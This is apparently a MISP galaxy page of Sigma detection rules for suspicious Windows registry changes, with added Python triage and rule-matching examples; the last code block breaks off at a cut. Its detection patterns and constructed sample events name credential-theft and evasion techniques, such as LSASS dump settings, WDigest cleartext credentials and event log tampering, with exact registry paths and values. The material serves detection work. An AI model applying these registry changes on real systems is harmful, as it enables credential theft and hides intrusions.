- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
| creation_date | 2019-10-25 |
| falsepositive | ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason'] |
| filename | registry_set_asep_reg_keys_modification_wow6432node.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Execution DLL of Choice Using WAB.EXE
Detects a change to the registry value holding the path of the DLL that WAB.exe loads at launch: when that path differs from the default, starting WAB.exe loads a DLL of the attacker's choice.
Internal MISP references
UUID fc014922-5def-4da9-a0fc-28c973f41bfb which can be used as unique global reference for Execution DLL of Choice Using WAB.EXE in MISP communities and other software using the MISP galaxy
External references
- https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml - webarchive
- http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ - webarchive
- https://twitter.com/Hexacorn/status/991447379864932352 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | oscd.community, Natalia Shornikova |
| creation_date | 2020-10-13 |
| falsepositive | ['Unknown'] |
| filename | registry_set_wab_dllpath_reg_change.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
Suspicious Application Allowed Through Exploit Guard
Detects applications being added to the "allowed applications" list of Exploit Guard in order to bypass Controlled Folder Access settings.
Internal MISP references
UUID 42205c73-75c8-4a63-9db1-e3782e06fda0 which can be used as unique global reference for Suspicious Application Allowed Through Exploit Guard in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-05 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_exploit_guard_susp_allowed_apps.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Potential Persistence Via Custom Protocol Handler
Detects potential persistence activity via the registration of a new custom protocol handler. Legitimate applications often register protocol handlers during installation, but an attacker can abuse the same mechanism by setting a custom handler to be used for persistence.
Internal MISP references
UUID fdbf0b9d-0182-4c43-893b-a1eaab92d085 which can be used as unique global reference for Potential Persistence Via Custom Protocol Handler in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-05-30 |
| falsepositive | ['Many legitimate applications can register a new custom protocol handler. Additional filters need to be applied according to your environment.'] |
| filename | registry_set_persistence_custom_protocol_handler.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Add Debugger Entry To AeDebug For Persistence
Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence; the configured debugger is invoked whenever an application crashes.
Internal MISP references
UUID 092af964-4233-4373-b4ba-d86ea2890288 which can be used as unique global reference for Add Debugger Entry To AeDebug For Persistence in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-21 |
| falsepositive | ['Legitimate use of the key to set up a debugger, which is often the case on developer machines'] |
| filename | registry_set_aedebug_persistence.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence'] |
Potentially Suspicious Desktop Background Change Via Registry
Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
Internal MISP references
UUID 85b88e05-dadc-430b-8a9e-53ff1cd30aae which can be used as unique global reference for Potentially Suspicious Desktop Background Change Via Registry in MISP communities and other software using the MISP galaxy
External references
- https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI - webarchive
- https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/ - webarchive
- https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior - webarchive
- https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper - webarchive
- https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html - webarchive
- https://www.attackiq.com/2023/09/20/emulating-rhysida/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_desktop_background_change.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ) |
| creation_date | 2023-12-21 |
| falsepositive | ['Administrative scripts that change the desktop background to a company logo or other image.'] |
| filename | registry_set_desktop_background_change.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.impact', 'attack.t1112', 'attack.t1491.001'] |
Related clusters
To see the related clusters, click here.
Potential PendingFileRenameOperations Tampering
Detects changes to the "PendingFileRenameOperations" registry value from uncommon or suspicious image locations, staging files that are currently in use for rename or deletion after reboot.
Internal MISP references
UUID 4eec988f-7bf0-49f1-8675-1e6a510b3a2a which can be used as unique global reference for Potential PendingFileRenameOperations Tampering in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html - webarchive
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN - webarchive
- https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6 - webarchive
- https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/ - webarchive
- https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2023-01-27 |
| falsepositive | ['Installers and updaters may set currently in use files for rename or deletion after a reboot.'] |
| filename | registry_set_susp_pendingfilerenameoperations.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036.003'] |
Related clusters
To see the related clusters, click here.
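A hit on the rule above leaves two questions for the analyst: what exactly will the session manager rename or delete at the next boot, and is the process that wrote the value one that legitimately does this? The following is an added example, not code from the MISP galaxy or the SigmaHQ rule, that decodes the REG_MULTI_SZ layout of PendingFileRenameOperations and applies a simple image-location check. The trusted and suspicious directory lists and the two sample events are constructed for the example and should be tuned per environment; the value is assumed to be available as a list of strings as read back from the registry, not in whatever flattened text form a given log source renders.

```python
# Added example; not code from the MISP galaxy or the SigmaHQ rule. It decodes
# a PendingFileRenameOperations value into the operations the session manager
# will perform at the next boot and triages the process that wrote it.
#
# Layout of the value (REG_MULTI_SZ): consecutive (source, destination) pairs,
# paths in NT form ("\??\C:\..."). An empty destination means delete the
# source at boot; a destination starting with "!" means replace an existing file.

NT_PREFIX = "\\??\\"

# Constructed allowlist of where installers and the servicing stack run from;
# tune per environment. Anything outside it that also lives under a
# user-writable location counts as "uncommon" for this example.
TRUSTED_IMAGE_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                      "c:\\windows\\winsxs\\", "c:\\program files\\",
                      "c:\\program files (x86)\\")
SUSPICIOUS_IMAGE_DIRS = ("\\users\\", "\\appdata\\", "\\temp\\",
                         "\\programdata\\", "\\public\\", "\\perflogs\\")


def _strip_nt(path):
    return path[len(NT_PREFIX):] if path.startswith(NT_PREFIX) else path


def parse_pending_ops(multi_sz):
    """Pair up the REG_MULTI_SZ strings and classify each staged operation."""
    if len(multi_sz) % 2:
        raise ValueError("PendingFileRenameOperations needs an even number of strings")
    ops = []
    for src, dst in zip(multi_sz[0::2], multi_sz[1::2]):
        if dst == "":
            op = "delete"
        elif dst.startswith("!"):
            op, dst = "replace", dst[1:]
        else:
            op = "rename"
        ops.append({"op": op, "src": _strip_nt(src), "dst": _strip_nt(dst)})
    return ops


def image_is_uncommon(image):
    """True when the writing process runs from a user-writable, non-install path."""
    img = image.casefold()
    if any(img.startswith(d) for d in TRUSTED_IMAGE_DIRS):
        return False
    return any(d in img for d in SUSPICIOUS_IMAGE_DIRS)


def triage(event):
    """Staged operations worth alerting on; [] when the writer is a trusted image.

    event["Details"] is assumed to already be the list of strings as read back
    from the registry (e.g. winreg.QueryValueEx or Get-ItemProperty)."""
    if not image_is_uncommon(event["Image"]):
        return []
    return parse_pending_ops(event["Details"])


# Constructed sample events (not real telemetry).
EVENT_UNCOMMON = {
    "Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\stage.exe",
    "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\PendingFileRenameOperations",
    "Details": ["\\??\\C:\\Users\\Public\\loader.dll", "",
                "\\??\\C:\\Users\\Public\\drv.tmp",
                "!\\??\\C:\\Windows\\System32\\drivers\\drv.sys"],
}
EVENT_TRUSTED = dict(EVENT_UNCOMMON, Image="C:\\Windows\\System32\\msiexec.exe")

if __name__ == "__main__":
    for op in triage(EVENT_UNCOMMON):
        print(f"{op['op']:8} {op['src']} -> {op['dst'] or '(removed)'}")
```

Running the sample shows the staged delete of loader.dll and the replace of a driver file from a temp-directory writer, while the same value written by msiexec.exe is suppressed, which mirrors the rule's false-positive note about installers and updaters.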
Potential Persistence Via GlobalFlags
Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
Internal MISP references
UUID 36803969-5421-41ec-b92f-8500f79c23b0 which can be used as unique global reference for Potential Persistence Via GlobalFlags in MISP communities and other software using the MISP galaxy
External references
- https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ - webarchive
- https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Karneades, Jonhnathan Ribeiro, Florian Roth |
| creation_date | 2018-04-11 |
| falsepositive | ['Unknown'] |
| filename | registry_set_persistence_globalflags.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1546.012', 'car.2013-01-002'] |
Related clusters
To see the related clusters, click here.
Potential Attachment Manager Settings Associations Tamper
Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)
Internal MISP references
UUID a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47 which can be used as unique global reference for Potential Attachment Manager Settings Associations Tamper in MISP communities and other software using the MISP galaxy
External references
- https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738 - webarchive
- https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-01 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_policies_associations_tamper.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Hiding User Account Via SpecialAccounts Registry Key
Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
Internal MISP references
UUID f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd which can be used as unique global reference for Hiding User Account Via SpecialAccounts Registry Key in MISP communities and other software using the MISP galaxy
External references
- https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), frack113 |
| creation_date | 2022-07-12 |
| falsepositive | ['Unknown'] |
| filename | registry_set_special_accounts.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1564.002'] |
Related clusters
To see the related clusters, click here.
Registry Persistence via Explorer Run Key
Detects a possible persistence mechanism using the Run key of Windows Explorer and pointing to a suspicious folder
Internal MISP references
UUID b7916c2a-fa2f-4795-9477-32b731f70f11 which can be used as unique global reference for Registry Persistence via Explorer Run Key in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), oscd.community |
| creation_date | 2018-07-18 |
| falsepositive | ['Unknown'] |
| filename | registry_set_susp_reg_persist_explorer_run.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Related clusters
To see the related clusters, click here.
Potential CobaltStrike Service Installations - Registry
Detects known malicious service installs that appear when a Cobalt Strike beacon elevates privileges or moves laterally.
Internal MISP references
UUID 61a7697c-cb79-42a8-a2ff-5f0cdfae0130 which can be used as unique global reference for Potential CobaltStrike Service Installations - Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Wojciech Lesicki |
| creation_date | 2021-06-29 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_cobaltstrike_service_installs.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.execution', 'attack.privilege-escalation', 'attack.lateral-movement', 'attack.t1021.002', 'attack.t1543.003', 'attack.t1569.002'] |
Related clusters
To see the related clusters, click here.
Windows Event Log Access Tampering Via Registry
Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding defense evasion by controlling who can view or modify an event log channel. After such a change, the affected users can no longer access the event log channel via Event Viewer or via utilities such as "Get-EventLog" or "wevtutil".
Internal MISP references
UUID ba226dcf-d390-4642-b9af-b534872f1156 which can be used as unique global reference for Windows Event Log Access Tampering Via Registry in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language - webarchive
- https://www.atomicredteam.io/atomic-red-team/atomics/T1562.002#atomic-test-8---modify-event-log-channel-access-permissions-via-registry---powershell - webarchive
- https://www.youtube.com/watch?v=uSYvHUVU8xY - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_event_log_access.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | X__Junior |
| creation_date | 2025-01-16 |
| falsepositive | ['Administrative activity, still unlikely'] |
| filename | registry_set_disable_windows_event_log_access.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1547.001', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
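The signal the rule above keys on is a rewritten SDDL string, so triage comes down to reading that string. As an added example (not the rule's own logic and not code from the MISP galaxy), here is a small parser for the DACL portion of an event log channel descriptor that lists access-denied ACEs and the accounts still allowed to read. The right-name mapping is the documented event log access mask (read 0x1, write 0x2, clear 0x4); the two descriptors at the bottom are constructed for the example, not captured from a host.

```python
import re

# Added example; not code from the MISP galaxy or the SigmaHQ rule. It parses
# the SDDL string written to an event log channel's access value and flags
# access-denied ACEs, which is the change the rule above is looking for.

# Event log access rights as documented for channel security descriptors.
EVENTLOG_RIGHTS = {0x1: "read", 0x2: "write", 0x4: "clear"}

# A few well-known SDDL SID abbreviations and SIDs seen in channel descriptors.
WELL_KNOWN = {"SY": "Local System", "BA": "Administrators", "BU": "Users",
              "WD": "Everyone", "AU": "Authenticated Users",
              "S-1-5-32-573": "Event Log Readers"}

_DACL = re.compile(r"D:([A-Z]*)((?:\([^)]*\))*)")
_ACE = re.compile(r"\(([^)]*)\)")


def decode_rights(token):
    """Map a hex access mask to right names; symbolic tokens are kept verbatim."""
    if not token.lower().startswith("0x"):
        return [token]
    mask = int(token, 16)
    return [name for bit, name in EVENTLOG_RIGHTS.items() if mask & bit]


def parse_dacl(sddl):
    """Return the DACL ACEs of an SDDL string as dicts (owner, group, SACL ignored)."""
    m = _DACL.search(sddl)
    if not m:
        return []
    aces = []
    for body in _ACE.findall(m.group(2)):
        parts = body.split(";")
        if len(parts) < 6:
            continue  # malformed ACE: skip rather than guess
        ace_type, ace_flags, rights, _obj_guid, _inherit_guid, sid = parts[:6]
        aces.append({"type": ace_type, "flags": ace_flags, "sid": sid,
                     "account": WELL_KNOWN.get(sid, sid),
                     "rights": decode_rights(rights)})
    return aces


def deny_aces(sddl):
    """Access-denied ACEs; a stock channel descriptor has none."""
    return [a for a in parse_dacl(sddl) if a["type"] == "D"]


def readers(sddl):
    """Accounts explicitly allowed to read, minus those with a read deny.

    Group membership is not resolved here: a deny on Users (BU) or Everyone (WD)
    also hits administrators in practice, so treat any read deny as an alert."""
    denied = {a["sid"] for a in deny_aces(sddl) if "read" in a["rights"]}
    return [a["account"] for a in parse_dacl(sddl)
            if a["type"] == "A" and "read" in a["rights"] and a["sid"] not in denied]


# Constructed descriptors (not copied from a live system): a typical default
# for the Security log, and the same with a read deny for Administrators prepended.
DEFAULT_SD = "O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)"
TAMPERED_SD = "O:BAG:SYD:(D;;0x1;;;BA)(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)"

if __name__ == "__main__":
    for label, sd in (("default", DEFAULT_SD), ("tampered", TAMPERED_SD)):
        print(label, "deny:", [(a["account"], a["rights"]) for a in deny_aces(sd)],
              "readers:", readers(sd))
```

With Sysmon Event ID 13 a REG_SZ write arrives as the string itself in the Details field, so the same `deny_aces` check can run directly on the logged value. Because access checks stop at the first matching deny ACE, a single `(D;;0x1;;;...)` entry is enough to lock a group out regardless of the allow ACEs that follow it.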
RestrictedAdminMode Registry Value Tampering
Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system you connect to using Remote Desktop, so your credentials cannot be harvested during the initial connection if the remote server has been compromised.
Internal MISP references
UUID d6ce7ebd-260b-4323-9768-a9631c8d4db2 which can be used as unique global reference for RestrictedAdminMode Registry Value Tampering in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md - webarchive
- https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2023-01-13 |
| falsepositive | ['Unknown'] |
| filename | registry_set_lsa_disablerestrictedadmin.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Lsass Full Dump Request Via DumpType Registry Settings
Detects the setting of the "DumpType" registry value to "2", which stands for a "Full Dump". Techniques such as LSASS Shtinkering require this value to be "2" in order to dump LSASS.
Internal MISP references
UUID 33efc23c-6ea2-4503-8cfe-bdf82ce8f719 which can be used as unique global reference for Lsass Full Dump Request Via DumpType Registry Settings in MISP communities and other software using the MISP galaxy
External references
- https://github.com/deepinstinct/Lsass-Shtinkering - webarchive
- https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf - webarchive
- https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | @pbssubhash |
| creation_date | 2022-12-08 |
| falsepositive | ['Legitimate application that needs to do a full dump of their process'] |
| filename | registry_set_lsass_usermode_dumping.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001'] |
Related clusters
To see the related clusters, click here.
Security Event Logging Disabled via MiniNt Registry Key - Registry Set
Detects the addition of the 'MiniNt' key to the registry. After a reboot, the Windows Event Log service stops writing events. The Windows Event Log service collects and stores event logs from the operating system and applications and is an important component of Windows security and auditing. An adversary may disable it to suppress logging of security events that could otherwise reveal their activity.
Internal MISP references
UUID 8839e550-52d7-4958-9f2f-e13c1e736838 which can be used as unique global reference for Security Event Logging Disabled via MiniNt Registry Key - Registry Set in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-04-09 |
| falsepositive | ['Highly Unlikely'] |
| filename | registry_set_create_minint_key.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1562.002', 'attack.t1112', 'car.2022-03-001'] |
Related clusters
To see the related clusters, click here.
Hypervisor Enforced Paging Translation Disabled
Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value where it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.
Internal MISP references
UUID 7f2954d2-99c2-4d42-a065-ca36740f187b which can be used as unique global reference for Hypervisor Enforced Paging Translation Disabled in MISP communities and other software using the MISP galaxy
External references
- https://github.com/AaLl86/WindowsInternals/blob/070dc4f317726dfb6ffd2b7a7c121a33a8659b5e/Slides/Hypervisor-enforced%20Paging%20Translation%20-%20The%20end%20of%20non%20data-driven%20Kernel%20Exploits%20(Recon2024).pdf - webarchive
- https://twitter.com/standa_t/status/1808868985678803222 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedpagingtranslation_disabled.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-07-05 |
| falsepositive | ['Unknown'] |
| filename | registry_set_deviceguard_hypervisorenforcedpagingtranslation_disabled.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Wdigest Enable UseLogonCredential
Detects potential malicious modification of the UseLogonCredential value under HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable storage of clear-text credentials
Internal MISP references
UUID d6a9b252-c666-4de6-8806-5561bbbd3bdc which can be used as unique global reference for Wdigest Enable UseLogonCredential in MISP communities and other software using the MISP galaxy
External references
- https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html - webarchive
- https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649 - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/73fcfa1d4863f6a4e17f90e54401de6e30a312bb/atomics/T1112/T1112.md#atomic-test-3---modify-registry-to-store-logon-credentials - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| creation_date | 2019-09-12 |
| falsepositive | ['Unknown'] |
| filename | registry_set_wdigest_enable_uselogoncredential.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
DHCP Callout DLL Installation
Detects the installation of a Callout DLL via the CalloutDlls and CalloutEnabled parameters in the registry, which can be used to execute code in the context of the DHCP server (restart required)
Internal MISP references
UUID 9d3436ef-9476-4c43-acca-90ce06bdf33a which can be used as unique global reference for DHCP Callout DLL Installation in MISP communities and other software using the MISP galaxy
External references
- https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx - webarchive
- https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html - webarchive
- https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Dimitrios Slamaris |
| creation_date | 2017-05-15 |
| falsepositive | ['Unknown'] |
| filename | registry_set_dhcp_calloutdll.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1574.001', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
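Several of the rules above (SpecialAccounts UserList, DisableRestrictedAdmin, DumpType for lsass.exe, WDigest UseLogonCredential, the DHCP CalloutDlls/CalloutEnabled parameters and GlobalFlags) share one shape: a registry_set event whose TargetObject ends in or contains a known path and whose Details carry a specific value. The following is an added example, not code from the MISP galaxy or the SigmaHQ rules, that evaluates simplified paraphrases of those selections over constructed Sysmon Event ID 13 records. The rule bodies are a reduction of the descriptions on this page rather than the upstream YAML (the real rules carry extra filters), the field names are Sysmon's (TargetObject, Details, Image), and the sample events are made up.

```python
# Added example; not code from the MISP galaxy or the SigmaHQ rules. It
# evaluates simplified paraphrases of the registry_set rules described above
# over constructed Sysmon Event ID 13 (SetValue) records. Sigma's
# category: registry_set maps to these Sysmon fields; Sysmon renders DWORD
# data as "DWORD (0x00000001)", which is why the Details strings look that way.

# Each rule: every present key must match (AND); each list is any-of (OR).
RULES = [
    {"title": "Hiding User Account Via SpecialAccounts Registry Key",
     "contains": ["\\SpecialAccounts\\UserList\\"],
     "details": ["DWORD (0x00000000)"]},
    {"title": "RestrictedAdminMode Registry Value Tampering",
     "endswith": ["\\Control\\Lsa\\DisableRestrictedAdmin"],
     "details": ["DWORD (0x00000000)", "DWORD (0x00000001)"]},
    {"title": "Lsass Full Dump Request Via DumpType Registry Settings",
     "endswith": ["\\LocalDumps\\lsass.exe\\DumpType"],
     "details": ["DWORD (0x00000002)"]},
    {"title": "Wdigest Enable UseLogonCredential",
     "endswith": ["\\SecurityProviders\\WDigest\\UseLogonCredential"],
     "details": ["DWORD (0x00000001)"]},
    {"title": "DHCP Callout DLL Installation",
     "endswith": ["\\Services\\DHCPServer\\Parameters\\CalloutDlls",
                  "\\Services\\DHCPServer\\Parameters\\CalloutEnabled"]},
    {"title": "Potential Persistence Via GlobalFlags",
     "contains": ["\\Image File Execution Options\\", "\\SilentProcessExit\\"],
     "endswith": ["\\GlobalFlag", "\\MonitorProcess"]},
]


def _any_of(haystack, needles, op):
    # Sigma string matching is case-insensitive: casefold both sides.
    return any(op(haystack, n.casefold()) for n in needles)


def match_rule(rule, event):
    target = event.get("TargetObject", "").casefold()
    details = event.get("Details", "").casefold()
    if "contains" in rule and not _any_of(target, rule["contains"], lambda h, n: n in h):
        return False
    if "endswith" in rule and not _any_of(target, rule["endswith"], str.endswith):
        return False
    if "details" in rule and not _any_of(details, rule["details"], str.__eq__):
        return False
    return True


def evaluate(events, rules=RULES):
    """Return (rule title, event) for every matching pair, in event order."""
    return [(r["title"], e) for e in events for r in rules if match_rule(r, e)]


# Constructed sample events (not real telemetry): one per rule, in rule order,
# plus a non-matching control at the end.
def _ev(image, target, details):
    return {"EventID": 13, "EventType": "SetValue", "Image": image,
            "TargetObject": target, "Details": details}

REG = "C:\\Windows\\System32\\reg.exe"
EVENTS = [
    _ev(REG, "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\svc_backup",
        "DWORD (0x00000000)"),
    _ev(REG, "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin",
        "DWORD (0x00000001)"),
    _ev(REG, "HKLM\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\lsass.exe\\DumpType",
        "DWORD (0x00000002)"),
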